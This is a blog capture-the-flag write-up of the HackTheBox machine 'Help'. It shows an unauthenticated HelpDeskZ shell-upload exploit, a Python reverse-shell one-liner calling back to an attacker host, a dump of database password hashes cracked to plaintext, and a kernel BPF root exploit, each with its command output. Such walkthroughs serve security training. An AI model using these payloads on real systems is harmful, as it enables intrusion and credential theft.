HackTheBox writeup of "Help"

my first writeup for a hackthebox.eu machine called: Help,
$ nmap -Pn –script vuln
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-11 13:22 CEST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for
Host is up (0.041s latency).
Not shown: 997 closed ports
22/tcp open ssh
80/tcp open http
| http-cookie-flags:
| /support/:
|_ httponly flag not set
|_http-csrf: Couldn’t find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn’t find any DOM based XSS.
| http-enum:
|_ /support/: Potentially interesting folder
|_http-stored-xss: Couldn’t find any stored XSS vulnerabilities.
3000/tcp open ppp fileupload through a helpdeskz installation
/*submit_ticket_controller.php – Line 141*
$filename = md5($_FILES[‘attachment’][‘name’].time()).”.”.$ext;
files uploaded get get obfuscated similar to HackinOS (Vulnhub) md5 of the filname and current time.
unfortunately .php files arent allowed on the machine. too bad. tried nullbyte filenames cmd.gif^@.php etc. no luck. ah ok it seems gifs are not allowed
at least https://packetstormsecurity.com/files/138548/helpdeskz-shell.txt taught me how i could have improved my script for hackinOS.
https://vulners.com/zdt/1337DAY-ID-26838 filedownload looks promising
ok as my colleauges from link protect suggested i tried again to upload a php file and not get confused by error messages. i tried, still no luck, but then i played around with the exploit script und looked at the original helpdeskz and realized that the exploit didnt add the proper upload directory and i had to point it myself…doh, it instantly worked:
$ python hackthebox/help_expl.py ja.gif0x00.php
Helpdeskz v1.0.2 – Unauthenticated shell upload exploit
GIF89a; root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false messagebus:x:106:110::/var/run/dbus:/bin/false uuidd:x:107:111::/run/uuidd:/bin/false help:x:1000:1000:help,,,:/home/help:/bin/bash sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin mysql:x:109:117:MySQL Server,,,:/nonexistent:/bin/false Debian-exim:x:110:118::/var/spool/exim4:/bin/false
i’ve got RCE ๐Ÿ™‚
i tried a few reverse shells, a python one python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“”,2323));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’
got shell ๐Ÿ™‚
tty upgrade python -c ‘import pty; pty.spawn(“/bin/bash”)’
python -c ‘import pty; pty.spawn(“/bin/dash”)’
also help@help:/home/help$ whoami
user ๐Ÿ™‚
enumerating i found
$ cat /var/www/html/support/includes/config.php
show databases;
show databases;
| Database |
| information_schema |
| mysql |
| performance_schema |
| support |
| sys |
5 rows in set (0.00 sec)
use support;
mysql> SELECT * FROM users;
SELECT * FROM users;
| id | salutation | fullname | email | password | timezone | status |
| 1 | 0 | helpme | helpme@helpme.com | c3b3bd1eb5142e29adb0044b16ee4d402d06f9ca | Indian/Christmas | 1 |
| 53 | 0 | Foo Bar | foo@bar.nul | 439d32d3c8e4170db7c2bd3dce1ba29c0cec11b4 | NULL | 1 |
53 rows in set (0.00 sec)
| 1 | 0 | helpme | helpme@helpme.com | c3b3bd1eb5142e29adb0044b16ee4d402d06f9ca | Indian/Christmas | 1 |
c3b3bd1eb5142e29adb0044b16ee4d402d06f9ca sha1 godhelpmeplz
5d3c93182bb20f07b994a7f617e99cff md5 godhelpmeplz
we got a passwd for the helpdeskz
with cat <<EOF < enum.sh
script here
i could manage to get my enumeration script on the box without having a real tty. to remember! after enum, i started looking for priv esc exploits for the configuration i found some exploits for the kernel version.
Linux version 4.4.0-116-generic (buildd@lgw01-amd64-021) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.9) ) #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018
after trying a few i found this one working https://www.exploit-db.com/exploits/45010
$ gcc bx.c -o bx
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff8800369add00
[*] Leaking sock struct from ffff88000622a400
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff88003aa15680
[*] UID from cred structure: 1000, matches the current: 1000
[*] hammering cred structure at ffff88003aa15680
[*] credentials patched, launching shell…
# cat /root/root.txt
cat /root/root.txt
# whoami

Leave a Comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.